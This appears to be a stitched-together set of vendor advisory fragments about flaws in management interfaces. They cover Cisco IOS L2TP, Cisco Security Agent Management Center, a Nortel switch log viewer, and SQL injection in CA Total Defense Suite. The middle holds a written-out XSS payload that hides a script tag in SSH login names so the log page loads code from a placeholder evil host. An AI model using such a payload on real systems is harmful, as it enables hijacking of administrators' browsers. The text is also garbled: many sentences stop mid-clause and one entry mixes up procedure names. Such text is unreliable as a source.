The Management
A vulnerability exists in the Cisco IOS software implementation of
Layer 2 Tunneling Protocol (L2TP), which affects limited Cisco IOS
software releases.
Several features enable the L2TP mgmt daemon process within Cisco IOS
software, including but not limited to Layer 2 virtual private
networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack
Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up
Networks (VPDN). Once this process is enabled the device is
vulnerable.
+---------------------------------------------------------------------
Summary
=======
The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an
When administrator have a look into log via BBI, his browser get that:
...
Jul 3 13:12:44 <NortelSwitch> NOTICE mgmt: Failed login attempt via SSH from host
<AttackerHost>, user <script a="<BR>Jul 3 13:13:08 <NortelSwitch> NOTICE mgmt:
Failed login attempt via SSH from host <AttackerHost>, user "
src="http://<EvilHost>/inj.js" b="<BR>Jul 3 13:13:23 <NortelSwitch> NOTICE mgmt:
Failed login attempt via SSH from host <AttackerHost>, user "></script><BR>
+---------------------------------------------------------------------
Summary
=======
The Management Center for Cisco Security Agent is affected by a
vulnerability that may allow an unauthenticated attacker to perform
remote code execution on the affected device.
Cisco has released free software updates that address this
vulnerability.
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the ExportReport stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the ExportReport stored
procedure, it is possible for a remote, unauthenticated user to inject
arbitrary SQL commands in the SOAP request--which could ultimately lead
to arbitrary code execution under the context of the SYSTEM user by
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the DeleteReports stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the DeleteReports stored
procedure, it is possible for a remote, unauthenticated user to inject
arbitrary SQL commands in the SOAP request which could ultimately lead
to arbitrary code execution under the context of the SYSTEM user by
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the UnassignAdminRoles stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the
UnAssignFunctionalUsers stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the DeleteReportLayout stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the DeleteReportLayout
stored procedure, it is possible for a remote, un-authenticated user to
inject arbitrary SQL commands in the SOAP request which could ultimately
lead to arbitrary code execution under the context of the SYSTEM user by
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the NonAssignedUserList stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
NonAssignedUserList stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the UnAssignFunctionalRoles stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
UnAssignFunctionalUsers stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite r12. Authentication
is not required to exploit this vulnerability.
The specific flaw exists within the RegenerateReport stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the RegenerateReport
stored procedure, it is possible for a remote, unauthenticated user to
inject arbitrary SQL commands in the SOAP request which could ultimately
lead to arbitrary code execution under the context of the SYSTEM user by
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.
The specific flaw exists within the uncsp_ViewReportsHomepage stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
uncsp_ViewReportsHomepage stored procedure, it is possible for a remote,
unauthenticated user to inject arbitrary SQL commands in the SOAP
request--which could ultimately lead to arbitrary code execution under
|
